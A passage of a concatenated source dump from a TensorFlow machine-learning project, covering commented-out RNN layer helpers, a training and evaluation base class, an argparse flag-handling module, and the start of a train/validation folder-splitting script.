# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# culstm_bw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional",
# dtype=tf.float32)
# culstm_bw.build(inputs.get_shape())
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = culstm_bw(reverse_inputs, training=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # culstm_bw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
# # culstm_bw.build(inputs.get_shape())
# # reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# # outputs_bw = culstm_bw(reverse_inputs, training=training)
# # outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
#
# else:
# single_cell = lambda: CudnnCompatibleLSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# cell_fw = MultiRNNCell([single_cell() for _ in range(1)])
# outputs_fw, _ = rnn(cell_fw, inputs, dtype=tf.float32, time_major=True)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# cell_bw = MultiRNNCell([single_cell() for _ in range(1)])
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = rnn(cell_bw, reverse_inputs, dtype=tf.float32, time_major=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
# # forward direction
# # with tf.compat.v1.variable_scope("culstm_forward"):
# # culstm_fw = tf.keras.layers.LSTM(units=n_hidden,activation='tanh',recurrent_activation='sigmoid', return_sequences=True)
# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# # # backward direction
# # with tf.compat.v1.variable_scope("culstm_backward"):
# # culstm_bw = tf.keras.layers.LSTM(units=n_hidden,activation='tanh',recurrent_activation='sigmoid', return_sequences=True)
# # culstm_bw.build(inputs.get_shape())
# # reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# # outputs_bw = culstm_bw(reverse_inputs, training=training)
# # outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # # concat
# # outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
#
# return outputs
#
#
#
# def cubgru(scope_or_name,
# inputs,
# n_hidden,
# use_gpu=True):
# with tf.compat.v1.variable_scope(scope_or_name):
# if use_gpu:
# lstm = CudnnGRU(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# lstm.build(inputs.get_shape())
# outputs, _ = lstm(inputs, training=True)
# else:
# single_cell = lambda: CudnnCompatibleGRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# cells_fw = [single_cell() for _ in range(1)]
# cells_bw = [single_cell() for _ in range(1)]
# outputs, _, _ = stack_bidirectional_dynamic_rnn(cells_fw, cells_bw, inputs, dtype=tf.float32,
# time_major=True)
#
# return outputs
#
# def cubrnn_to_cubrnn(scope_or_name, rnn_out):
# """
# Adds a utility layer to transform the output Tensor of a BRNN into a Tensor which fits a BRNN. This
# function assumes `time_major` == True in both BRNNs.
#
# Args:
# scope_or_name: `str` or `VariableScope`, the scope to open.
# rnn_out: tuple of `3-D Tensors`, length 2, the BRNN output (see tf.nn.bidirectional_dynamic_rnn for
# more information regarding the output format).
#
# Returns:
# `3-D Tensor`, the transformed `rnn_out` Tensor with shape `[max_time, batch_size, cell_size]`.
# """
# with tf.compat.v1.variable_scope(scope_or_name):
# # rnn_out = tf.Print(rnn_out,[tf.shape(rnn_out)],"Shape of RNN Output: ")
# shape_static = rnn_out.get_shape().as_list()
# cell_size = shape_static[2] // 2
# shape_dynamic = tf.shape(rnn_out)
# max_time = shape_dynamic[0]
# # max_time = tf.Print(max_time, [max_time], "MaxT: ")
# batch_size = shape_dynamic[1]
# # [max_time, batch_size, 2*cell_size] -> [max_time, batch_size, 2, cell_size]
# rnn_out = tf.reshape(rnn_out, shape=[max_time, batch_size, 2, cell_size])
# # [max_time, batch_size, 2, cell_size] -> [max_time, batch_size, cell_size]
# rnn_out = tf.reduce_sum(rnn_out, axis=2)
#
# # TODO: substitute?
# # rnn_in = rnn_out[0] + rnn_out[1]
# return rnn_out
#
# def cubrnn_to_conv(scope_or_name, rnn_out, data_format='NHWC'):
# """
# Adds a utility layer to transform the output Tensor of a bidirectional dynamic RNN into a Tensor which
# fits a convolutional layer. This function assumes `time_major` == True in the BRNN.
#
# Args:
# scope_or_name: `str` or `VariableScope`, the scope to open.
# rnn_out: tuple of `3-D Tensors`, length 2, the BRNN output (see tf.nn.bidirectional_dynamic_rnn
# for more information regarding the output format).
# data_format: `str` from ('NHWC', 'NCHW'), specifies the data format of the returned Tensor.
#
# Returns:
# `4-D Tensor`, the transformed `rnn_out` Tensor with its shape determined by `data_format`.
#
# For 'NHWC' the data is stored in the order of `[batch_size, cell_size, max_time, 1]`, which
# corresponds to `[batch_size, Y, X, Z]`.
#
# For 'NCHW' the data is stored in the order of `[batch_size, 1, cell_size, max_time]`, which
# corresponds to `[batch_size, Z, Y, X]`.
# """
# with tf.compat.v1.variable_scope(scope_or_name):
# shape_static = rnn_out.get_shape().as_list()
# cell_size = shape_static[2] // 2
# shape_dynamic = tf.shape(rnn_out)
# max_time = shape_dynamic[0]
# batch_size = shape_dynamic[1]
# # [max_time, batch_size, 2*cell_size] -> [max_time, batch_size, 2, cell_size]
# conv_in = tf.reshape(rnn_out, shape=[max_time, batch_size, 2, cell_size])
# # [max_time, batch_size, 2, cell_size] -> [max_time, batch_size, cell_size]
# conv_in = tf.reduce_sum(conv_in, axis=2)
# # [max_time, batch_size, cell_size] -> [batch_size, cell_size, max_time]
# conv_in = tf.transpose(conv_in, [1, 2, 0])
#
# if data_format == 'NHWC':
# # [batch_size, cell_size, max_time] -> [batch_size, cell_size, max_time, 1]
# conv_in = tf.reshape(conv_in, [batch_size, cell_size, max_time, 1])
# # [batch_size, cell_size, max_time, 1] corresponds to [batch_size, Y, X, Z], 'NHWC'
# else:
# # [batch_size, cell_size, max_time] -> [batch_size, 1, cell_size, max_time]
# conv_in = tf.reshape(conv_in, [batch_size, 1, cell_size, max_time])
# # [batch_size, 1, cell_size, max_time] corresponds to [batch_size, Z, Y, X], 'NCHW'
# return conv_in
def feat_norm(input, dimZ):
beta = tf.compat.v1.get_variable('beta', shape=(dimZ,), initializer=tf.constant_initializer(value=0.0))
gamma = tf.compat.v1.get_variable('gamma', shape=(dimZ,), initializer=tf.constant_initializer(value=1.0))
output, _, _ = tf.nn.fused_batch_norm(input, gamma, beta)
return output
#
# def separable_rnn(images, num_filters_out, scope=None, keep_prob=1.0, cellType='LSTM'):
# """Run bidirectional LSTMs first horizontally then vertically.
#
# Args:
# images: (num_images, height, width, depth) tensor
# num_filters_out: output layer depth
# nhidden: hidden layer depth
# scope: optional scope name
#
# Returns:
# (num_images, height, width, num_filters_out) tensor
# """
# with tf.compat.v1.variable_scope(scope, "SeparableLstm", [images]):
# with tf.compat.v1.variable_scope("horizontal"):
# if 'LSTM' in cellType:
# cell_fw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# cell_bw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# if 'GRU' in cellType:
# cell_fw = GRUCell(num_filters_out)
# cell_bw = GRUCell(num_filters_out)
# hidden = horizontal_cell(images, num_filters_out, cell_fw, cell_bw, keep_prob=keep_prob, scope=scope)
# with tf.compat.v1.variable_scope("vertical"):
# transposed = tf.transpose(hidden, [0, 2, 1, 3])
# if 'LSTM' in cellType:
# cell_fw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# cell_bw = LSTMCell(num_filters_out, use_peepholes=True, state_is_tuple=True)
# if 'GRU' in cellType:
# cell_fw = GRUCell(num_filters_out)
# cell_bw = GRUCell(num_filters_out)
# output_transposed = horizontal_cell(transposed, num_filters_out, cell_fw, cell_bw, keep_prob=keep_prob,
# scope=scope)
# output = tf.transpose(output_transposed, [0, 2, 1, 3])
# return output
#
# def horizontal_cell(images, num_filters_out, cell_fw, cell_bw, keep_prob=1.0, scope=None):
# """Run an LSTM bidirectionally over all the rows of each image.
#
# Args:
# images: (num_images, height, width, depth) tensor
# num_filters_out: output depth
# scope: optional scope name
#
# Returns:
# (num_images, height, width, num_filters_out) tensor, where
# """
# with tf.compat.v1.variable_scope(scope, "HorizontalGru", [images]):
# sequence = images_to_sequence(images)
#
# shapeT = tf.shape(sequence)
# sequence_length = shapeT[0]
# batch_sizeRNN = shapeT[1]
# sequence_lengths = tf.cast(
# tf.fill([batch_sizeRNN], sequence_length), dtype=tf.int64)
# forward_drop1 = DropoutWrapper(cell_fw, output_keep_prob=keep_prob)
# backward_drop1 = DropoutWrapper(cell_bw, output_keep_prob=keep_prob)
# rnn_out1, _ = tf.nn.bidirectional_dynamic_rnn(forward_drop1, backward_drop1, sequence, dtype=tf.float32,
# sequence_length=sequence_lengths, time_major=True,
# swap_memory=True, scope=scope)
# rnn_out1 = tf.concat(rnn_out1, 2)
# rnn_out1 = tf.reshape(rnn_out1, shape=[-1, batch_sizeRNN, 2, num_filters_out])
# output_sequence = tf.reduce_sum(rnn_out1, axis=2)
# batch_size = tf.shape(images)[0]
# output = sequence_to_images(output_sequence, batch_size)
# return output
#
# def images_to_sequence(tensor):
# """Convert a batch of images into a batch of sequences.
#
# Args:
# tensor: a (num_images, height, width, depth) tensor
#
# Returns:
# (width, num_images*height, depth) sequence tensor
# """
# transposed = tf.transpose(tensor, [2, 0, 1, 3])
#
# shapeT = tf.shape(transposed)
# shapeL = transposed.get_shape().as_list()
# # Calculate the ouput size of the upsampled tensor
# n_shape = tf.stack([
# shapeT[0],
# shapeT[1] * shapeT[2],
# shapeL[3]
# ])
# reshaped = tf.reshape(transposed, n_shape)
# return reshaped
#
# def sequence_to_images(tensor, num_batches):
# """Convert a batch of sequences into a batch of images.
#
# Args:
# tensor: (num_steps, num_batchesRNN, depth) sequence tensor
# num_batches: the number of image batches
#
# Returns:
# (num_batches, height, width, depth) tensor
# """
#
# shapeT = tf.shape(tensor)
# shapeL = tensor.get_shape().as_list()
# # Calculate the ouput size of the upsampled tensor
# height = tf.cast(shapeT[1] / num_batches, dtype=tf.int32)
# n_shape = tf.stack([
# shapeT[0],
# num_batches,
# height,
# shapeL[2]
# ])
#
# reshaped = tf.reshape(tensor, n_shape)
# return tf.transpose(reshaped, [1, 2, 0, 3])
# </editor-fold>
```
#### File: tf_neiss-1/trainer/trainer_base.py
```python
import glob
import logging
import os
import time
import tensorflow as tf
import util.flags as flags
from util.misc import get_commit_id, Tee
os.environ["CUDA_VISIBLE_DEVICES"] = ""
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Training
# ========
flags.define_integer('epochs', 200, 'Epochs to train. If checkpoint already has these epochs, '
'a evaluation and export is done')
flags.define_integer('samples_per_epoch', 100000, 'Samples shown to the net per epoch.')
# flags.define_boolean('calc_ema', False, 'Choose whether you want to use EMA (Exponential Moving Average) '
# 'weights or not,')
# flags.define_float('clip_grad', 0.0, 'gradient clipping value: for positive values GLOBAL norm clipping is performed,'
# ' for negative values LOCAL norm clipping is performed (default: %(default)s)')
flags.define_string('optimizer', 'DecayOptimizer', 'the optimizer used to compute and apply gradients.')
flags.define_dict('optimizer_params', {}, "key=value pairs defining the configuration of the optimizer.")
flags.define_string('learn_rate_schedule', "decay", 'decay, finaldecay, warmupfinaldecay')
flags.define_dict("learn_rate_params", {}, "key=value pairs defining the configuration of the learn_rate_schedule.")
# flags.define_string('train_scopes', '', 'Change only variables in this scope during training')
flags.define_integer('eval_every_n', 1, "Evaluate/Validate every 'n' epochs") # Todo: to be implemented
flags.define_string('checkpoint_dir', '', 'Checkpoint to save model information in.')
# flags.define_string('warmstart_dir', '', 'load pretrained model (ignored if checkpoint_dir already exists, '
# 'then this one is used).')
flags.define_boolean('reset_global_step', False, 'resets global_step, this restarts the learning_rate decay,'
'only works with load from warmstart_dir') # Todo: to be implemented
flags.define_list('train_lists', str, 'space seperated list of training sample lists',
"names of the training sample lists to use. You can provide a single list as well. ",
["lists/stazh_train.lst"])
flags.define_list('train_list_ratios', float, 'space seperated list of training sample list ratios',
"List has to have the same length as the train_list ", [1.0])
flags.define_integer('train_batch_size', 100, 'number of elements in a training batch, '
'samples between optimizer steps.')
# flags.define_integer('train_accum_steps', 1,
# 'Reduce on device batchSize by gradient accumulation (default: %(default)s).'
# 'Train_batch_size is divided by this factor BUT the gradient is accumulated'
# 'this many times, until an optimization step is performed. This allows HIGH'
# 'batchSizes even with limited memory and huge models.')
flags.define_string('val_list', None, '.lst-file specifying the dataset used for validation')
flags.define_integer('val_batch_size', 100, 'number of elements in a val_batch between training '
'epochs(default: %(default)s). '
'has no effect if status is not "train"')
# flags.define_boolean('profile', False, 'produce profile file each epoch')
# flags.define_boolean('predict_mode', False, 'If and only if true the prediction will be accomplished, '
# 'predict means no targets provided')
# flags.define_string('predict_list', '',
# '.lst-file specifying the dataset used for prediction. Only used in predict_mode')
# flags.define_string('predict_dir', '', 'path/to/file where to write the prediction')
# Hardware
# ========
# flags.define_boolean('xla', False, 'Disable in case of XLA related errors or performance issues (default: %(default)s)')
flags.define_list('gpu_devices', int, 'space seperated list of GPU indices to use. ', " ", [])
# flags.define_string('dist_strategy', 'mirror', 'DistributionStrategy in MultiGPU scenario. '
# 'mirror - MirroredStrategy, ps - ParameterServerStrategy')
# flags.define_boolean('gpu_auto_tune', False, 'GPU auto tune (default: %(default)s)')
# flags.define_float('gpu_memory', -1, 'set gpu memory in MB allocated on each (allowed) gpu')
flags.define_string('print_to', 'console', 'write prints to "console, "file", "both"')
flags.define_boolean("tensorboard", True, "if True: write tensorboard logs")
flags.define_boolean('force_eager', False, 'ignore tf.function decorator, run every thing eagerly for debugging')
flags.FLAGS.parse_flags()
class TrainerBase(object):
def __init__(self):
self._flags = flags.FLAGS
tee_path = os.path.join(os.path.dirname(flags.FLAGS.checkpoint_dir),
"log_" + os.path.basename(flags.FLAGS.checkpoint_dir) + ".txt")
if flags.FLAGS.print_to == "file":
self.tee = Tee(tee_path, console=False, delete_existing=False)
elif flags.FLAGS.print_to == "both":
self.tee = Tee(tee_path, console=True, delete_existing=False)
else:
self.tee = None
self.set_run_config()
flags.print_flags()
self._input_fn_generator = None
self._model_class = None
self._model = None
self._checkpoint_obj_val = None
self._optimizer_fn = None
self._optimizer = None
self._train_dataset = None
self._run_config = None
self._params = None
self._current_epoch = 0
self.epoch_loss = 0.0
self._train_collection = None
self._params = {'steps_per_epoch': int(self._flags.samples_per_epoch / self._flags.train_batch_size),
'num_gpus': len(self._flags.gpu_devices)}
def __del__(self):
# reset print streams
del self.tee
def train(self):
commit_id, repos_path = get_commit_id(os.path.realpath(__file__))
print("source code path:{}\ncommit-id: {}".format(repos_path, commit_id))
print("tf-version: {}".format(tf.__version__))
if not self._model:
self._model = self._model_class(self._params)
if not self._model.graph_train:
self._model.graph_train = self._model.get_graph()
self._model.set_optimizer()
self._model.graph_train.set_interface(self._input_fn_generator.get_input_fn_val())
self._model.graph_train.print_params()
self._model.graph_train.summary()
checkpoint_obj = tf.train.Checkpoint(step=self._model.graph_train.global_step, optimizer=self._model.optimizer,
model=self._model.graph_train)
checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint_obj, directory=flags.FLAGS.checkpoint_dir,
max_to_keep=1)
if tf.train.get_checkpoint_state(flags.FLAGS.checkpoint_dir):
print("restore from checkpoint: {}".format(flags.FLAGS.checkpoint_dir))
checkpoint_obj.restore(tf.train.latest_checkpoint(flags.FLAGS.checkpoint_dir))
if self._model.graph_train.global_epoch.numpy() >= self._flags.epochs:
print('Loaded model already in epoch {}. Evaluation...'.format(self._model.graph_train.global_epoch.numpy()))
self.eval() # run eval() if epochs reach on first attempt
self.export()
return 0
else:
print('starting in epoch ' + str(self._model.graph_train.global_epoch.numpy()))
if not self._train_dataset:
self._train_dataset = self._input_fn_generator.get_input_fn_train()
while True:
if self._model.graph_train.global_epoch.numpy() >= self._flags.epochs:
break
self.epoch_loss = 0.0
t1 = time.time()
for (batch, (input_features, targets)) in enumerate(self._input_fn_generator.get_input_fn_train()):
# do the _train_step as tf.function to improve performance
train_out_dict = self._train_step(input_features, targets)
self._model.to_tensorboard_train(train_out_dict, targets, input_features)
self.epoch_loss += train_out_dict["loss"]
if batch + 1 >= int(self._flags.samples_per_epoch / self._flags.train_batch_size):
# stop endless '.repeat()' dataset with break
break
self.epoch_loss /= float(batch + 1.0)
self._model.graph_train.global_epoch.assign_add(1)
print("\nepoch: {:10.0f}, optimizer steps: {:6}".format(self._model.graph_train.global_epoch.numpy(),
self._model.graph_train.global_step.numpy()))
print("train-loss:{:8.3f}, samples/seconde: {:1.1f}".format(self.epoch_loss,
flags.FLAGS.samples_per_epoch / (
time.time() - t1)))
# Save checkpoint each epoch
checkpoint_manager.save()
# Evaluation on this checkpoint
self.eval()
self._model.write_tensorboard()
self.export()
@tf.function
def _train_step(self, input_features, targets):
with tf.GradientTape() as self.tape:
self._model.graph_train._graph_out = self._model.graph_train(input_features, training=True)
loss = self._model.loss(predictions=self._model.graph_train._graph_out, targets=targets)
gradients = self.tape.gradient(loss, self._model.graph_train.trainable_variables)
self._model.optimizer.apply_gradients(zip(gradients, self._model.graph_train.trainable_variables))
self._model.graph_train.global_step.assign(self._model.optimizer.iterations)
return {"loss": tf.reduce_mean(loss)}
def eval(self):
if not self._model:
self._model = self._model_class(self._params)
if not self._model.graph_eval:
self._model.graph_eval = self._model.get_graph()
if not self._checkpoint_obj_val:
self._checkpoint_obj_val = tf.train.Checkpoint(model=self._model.graph_eval)
self._checkpoint_obj_val.restore(tf.train.latest_checkpoint(flags.FLAGS.checkpoint_dir))
val_loss = 0.0
t_val = time.time()
for (batch, (input_features, targets)) in enumerate(self._input_fn_generator.get_input_fn_val()):
input_features = {"fc": input_features["fc"], "fc2": input_features["fc"]}
self._model.graph_eval._graph_out = self._model.graph_eval(input_features, training=False)
loss = self._model.loss(predictions=self._model.graph_eval._graph_out, targets=targets)
self._model.graph_eval._graph_out["loss"] = loss
self._model.to_tensorboard_eval(self._model.graph_eval._graph_out, targets, input_features)
val_loss += tf.reduce_mean(loss)
val_loss /= float(batch + 1.0)
print(
"val-loss:{:10.3f}, samples/seconde: {:1.1f}".format(val_loss, (batch + 1) * flags.FLAGS.val_batch_size / (
time.time() - t_val)))
def export(self):
# Export as saved model
print("Export saved_model to: {}".format(os.path.join(flags.FLAGS.checkpoint_dir, "export")))
self._model.graph_train.save(os.path.join(flags.FLAGS.checkpoint_dir, "export"))
def set_run_config(self):
if flags.FLAGS.force_eager:
tf.config.experimental_run_functions_eagerly(run_eagerly=True)
gpu_list = ','.join(str(x) for x in flags.FLAGS.gpu_devices)
os.environ["CUDA_VISIBLE_DEVICES"] = gpu_list
print("GPU-DEVICES:", os.environ["CUDA_VISIBLE_DEVICES"])
```
#### File: tf_neiss-1/util/flags.py
```python
import argparse
import logging
import sys
from collections import OrderedDict
# =========================
# Extension of tf.app.flags
# =========================
class LineArgumentParser(argparse.ArgumentParser):
"""
Object for parsing command line strings into Python objects. Inherits from `argparse.ArgumentParser`.
Overrides the `convert_arg_line_to_args` method, such that each line in a file can contain the argument
and its values instead of each line only containing a single entry. Argument and values can be seperated
by spaces or with a ' = '. Anything commented with '#' is ignored.
"""
def convert_arg_line_to_args(self, arg_line):
args = arg_line.split()
for i, arg in enumerate(args):
# Cut off anything that is commented
if arg == "#":
return args[:i]
# Remove equals sign from args
if arg == "=":
args.remove("=")
return args
# Global object that can be used to access the parser.
usage_string = """%(prog)s [OPTIONS] [CONFIG]
You can add specific options via '--OPTION VALUE'
You can reference config files via '@path/to/config'"""
global_parser = LineArgumentParser(usage=usage_string, fromfile_prefix_chars="@")
class NamespaceWithOrder(argparse.Namespace):
"""
Object for storing attributes. Inherits from `argparse.Namespace`.
Implements the `__init__` and `__setattr__` methods, such that any call to `__setattr__`
saves the (`attr`, `value`) pair in an extra argument `order`, which is an ordered list.
This is useful if one wants to preserve the information in which order (`argument`, `value`)
pairs were added to the namespace. This includes default values of arguments, aswell as arguments
fed via the command line, although it will include duplicates if arguments get fed more than once.
"""
def __init__(self, **kwargs):
self.__dict__['order'] = []
super(NamespaceWithOrder, self).__init__(**kwargs)
def __setattr__(self, attr, value):
self.__dict__['order'].append((attr, value))
super(NamespaceWithOrder, self).__setattr__(attr, value)
class FlagValues(object):
"""Global container and accessor for flags and their values."""
def __init__(self):
self.__dict__['__flags'] = {}
self.__dict__['__parsed'] = False
self.__dict__['namespace'] = NamespaceWithOrder()
def parse_flags(self, args=None):
result, unparsed = global_parser.parse_known_args(args=args, namespace=self.__dict__['namespace'])
for flag_name, val in vars(result).items():
self.__dict__['__flags'][flag_name] = val
self.__dict__['__parsed'] = True
return unparsed
def hasKey(self, name_string):
return name_string in self.__dict__['__flags']
def __getattr__(self, name):
"""Retrieves the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self.parse_flags()
if name not in self.__dict__['__flags']:
raise AttributeError(name)
return self.__dict__['__flags'][name]
def __setattr__(self, name, value):
"""Sets the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self.parse_flags()
self.__dict__['__flags'][name] = value
# Global object that can be used to access the flags.
FLAGS = FlagValues()
def _define_helper(flag_name, default_value, docstring, flagtype, metavar):
"""Registers 'flag_name' with 'default_value', 'docstring' and 'metavar'."""
global_parser.add_argument('--' + flag_name,
default=default_value,
help=docstring,
type=flagtype,
metavar=metavar)
def define_string(flag_name, default_value, docstring, metavar="STR"):
"""
Defines a flag of type 'string'.
Args:
flag_name: `str`, the name of the flag.
default_value: `str`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, str, metavar)
def define_integer(flag_name, default_value, docstring, metavar="INT"):
"""
Defines a flag of type 'int'.
Args:
flag_name: `str`, the name of the flag.
default_value: `int`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, int, metavar)
def define_float(flag_name, default_value, docstring, metavar="FLOAT"):
"""
Defines a flag of type 'float'.
Args:
flag_name: `str`, the name of the flag.
default_value: `float`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
_define_helper(flag_name, default_value, docstring, float, metavar)
def define_boolean(flag_name, default_value, docstring, metavar="BOOL"):
"""
Defines a flag of type 'boolean'.
Args:
flag_name: `str`, the name of the flag.
default_value: `bool`, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
metavar: `str`, a name for the argument in usage messages.
"""
# Register a custom function for 'bool' so --flag=True works.
def str2bool(v):
return v.lower() in ('true', 't', '1')
global_parser.add_argument('--' + flag_name,
nargs='?',
const=True,
help=docstring,
default=default_value,
type=str2bool,
metavar=metavar)
# Add negated version, stay consistent with argparse with regard to
# dashes in flag names.
# global_parser.add_argument('--no_' + flag_name,
# action='store_false',
# dest=flag_name.replace('-', '_'))
# The internal google library defines the following alias, so we match
# the API for consistency.
DEFINE_bool = define_boolean # pylint: disable=invalid-name
def define_list(flag_name, flag_type, metavar, docstring, default_value=None):
"""
Defines a flag as a list of multiple entries.
Args:
flag_name: `str`, the name of the flag.
flag_type: the data type to which the list elements should be converted.
metavar: `str`, a name for the argument in usage messages.
docstring: `str`, a helpful message explaining the use of the flag.
default_value: `flag_type`, the default value the flag should take.
"""
global_parser.add_argument('--' + flag_name,
type=flag_type,
default=default_value,
nargs='*',
metavar=metavar,
help=docstring)
def define_choices(flag_name, choices, default_value, flag_type, metavar, docstring):
"""
Defines a flag with predefined choices.
Args:
flag_name: `str`, the name of the flag.
choices: `container`, contains the allowed values for the argument.
default_value: entry of `choices`, the default value the flag should take.
flag_type: the data type to which the flag should be converted.
metavar: `str`, a name for the argument in usage messages.
docstring: `str`, a helpful message explaining the use of the flag.
"""
global_parser.add_argument('--' + flag_name,
type=flag_type,
default=default_value,
choices=choices,
metavar=metavar,
help=docstring)
def define_dict(flag_name, default_value, docstring):
"""
Defines a flag as dictionary of key-value pairs.
Args:
flag_name: `str`, the name of the flag.
default_value: `dict` of key=value pairs, the default value the flag should take.
docstring: `str`, a helpful message explaining the use of the flag.
"""
global_parser.add_argument('--' + flag_name,
action=StoreDictKeyPair,
default=default_value,
nargs="*",
metavar="KEY=VAL",
help=docstring)
class StoreDictKeyPair(argparse.Action):
def is_number(self, string):
try:
float(string)
return True
except ValueError:
return False
def str_is_true(self, v):
return v.lower() in ('true', 't')
def str_is_false(self, v):
return v.lower() in ('false', 'f')
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(StoreDictKeyPair, self).__init__(option_strings, dest, nargs=nargs, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if not getattr(namespace, self.dest):
setattr(namespace, self.dest, {})
for kv in values:
if len(kv.split('=')) == 2:
key, val = kv.split("=")
# convert to type
if self.str_is_true(val):
val = True
elif self.str_is_false(val):
val = False
elif self.is_number(val):
f = float(val)
i = int(f)
val = i if i == f else f
# update the dict
getattr(namespace, self.dest).update({key: val})
def print_flags():
"""Prints all registered flags in order."""
order_final = OrderedDict()
for key, value in FLAGS.order:
order_final[key] = value
print("FLAGS:")
if int(sys.version[0]) < 3:
flag_list = order_final.items()
else:
flag_list = iter(order_final.items())
for key, value in flag_list:
print(" {} = {}".format(key, value))
def update_params(class_params, flag_params, name="", print_params=False):
"""update a dictionary holding various parameter (int, float, bool, list) using (a 'flag' containing) a dictionary
- all keyes from 'flag_params'should be in 'class_params or a critical warning is printed
- use print_params=True to print out what happens within
Args:
class_params: dictionary which is returned, with updated entries
flag_params: dictionary from which the update is made, should only contain key allready class_params:
name: just a string can be printed if print_params=True
print_params:
:return class_params: updated dictionayry"""
if print_params:
print("---{}---".format(name))
print("available {}_params:".format(name))
for i, j in enumerate(class_params):
print(" {}: {}".format(j, class_params[j]))
print("passed FLAGS.{}_params:".format(name))
for i, j in enumerate(flag_params):
print(" {}: {}".format(j, flag_params[j]))
for i in flag_params:
if i not in class_params:
logging.critical("Given {0}_params-key '{1}' is not used by {0}-class!".format(name, i))
list_params = [] # save keys with type list for later
for j in class_params:
# print(j, type(self.netparams[j]))
if isinstance(class_params[j], (list,)):
list_params.append(j)
# print(list_params)
class_params.update(flag_params)
for j in flag_params: # check if key with type list should be updated, cast given string to list
if j in list_params:
logging.info("//// Flags handling: cast {} to list".format(j))
assert isinstance(flag_params[j], str)
try:
# Integer Case
class_params[j] = [int(x) for x in flag_params[j][1:-1].split(",")]
except:
try:
# float Case
class_params[j] = [float(x) for x in flag_params[j][1:-1].split(",")]
except:
# If int/float cases fail, make it string...
class_params[j] = [x for x in flag_params[j][1:-1].split(",")]
if print_params:
print("updated {}_params:".format(name))
for i, j in enumerate(class_params):
print(" {}: {}".format(j, class_params[j]))
return class_params
# def run(main=None, argv=None):
# """Runs the program with an optional 'main' function and 'argv' list."""
# # Extract the args from the optional `argv` list.
# args = argv[1:] if argv else None
#
# # Parse the known flags from that list, or from the command
# # line otherwise.
# # pylint: disable=protected-access
# flags_passthrough = FLAGS.parse_flags(args=args)
# # pylint: enable=protected-access
#
# main = main or sys.modules['__main__'].main
#
# # Call the main function, passing through any arguments
# # to the final program.
# sys.exit(main(sys.argv[:1] + flags_passthrough))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--grid", action=StoreDictKeyPair, nargs="*", metavar="KEY=VAL",
default={'grid_height': 3, 'magnitude': 2, 'noise': 'normal', 'fixate_edges': True,
'map_edges': False})
args = parser.parse_args("--grid grid_height=4 magnitude=2.0 fix_edges=True test=1.25".split())
print(args)
```
#### File: util/tools/split_train_val.py
```python
import glob
import logging
import os
import shutil
import sys
"""script to divide a folder with generated/training data into a train and val folder
- val folder contains 500 Samples if not changed in source code
- DOES NOT work if images structured in subfolders, see below
- if there is no dir in the given folder -> split this folder
- if there are dir/s in the folder -> perform split on each folder
- split on sorted list -> repeated runs should give the same result
"""
def main(args):
foldername = args[1]
print("CWD: {}".format(os.getcwd()))
print("foldername: {}".format(foldername))
dirs = os.walk(foldername).next()[1]
dirs = [os.path.join(foldername, x) for x in dirs]
print(dirs)
if len(dirs) == 0:
print("no subdirs found -> run directly on {}".format(foldername))
dirs = [foldername]
for dir in dirs:
print("perform split on {}".format(dir))
dir_path = dir
# image_list = sorted(glob.glob1(os.path.join(foldername, dir_path), "*.jpg"))
image_list = sorted(glob.glob1(dir_path, "*.jpg"))
# image_list = sorted(glob.glob1(dir_path , "*.png"))
if len(image_list) == 0:
logging.error("Could not find any '*.jpg' in {}".format(dir_path))
exit(1)
else:
print(" found {} images".format(len(image_list)))
# val_len = int(len(image_list) * 0.1)
val_len = int(500)
val_list = image_list[:val_len]
train_list = image_list[val_len:]
# save first 10%/500 of list to val list
for subdir, part_list in zip(["val", "train"], [val_list, train_list]):
os.makedirs(os.path.join(dir_path, subdir))
print(" move files in {}...".format(subdir))
for image_file in part_list:
shutil.move(os.path.join(dir_path, image_file), os.path.join(dir_path, subdir, image_file))
try:
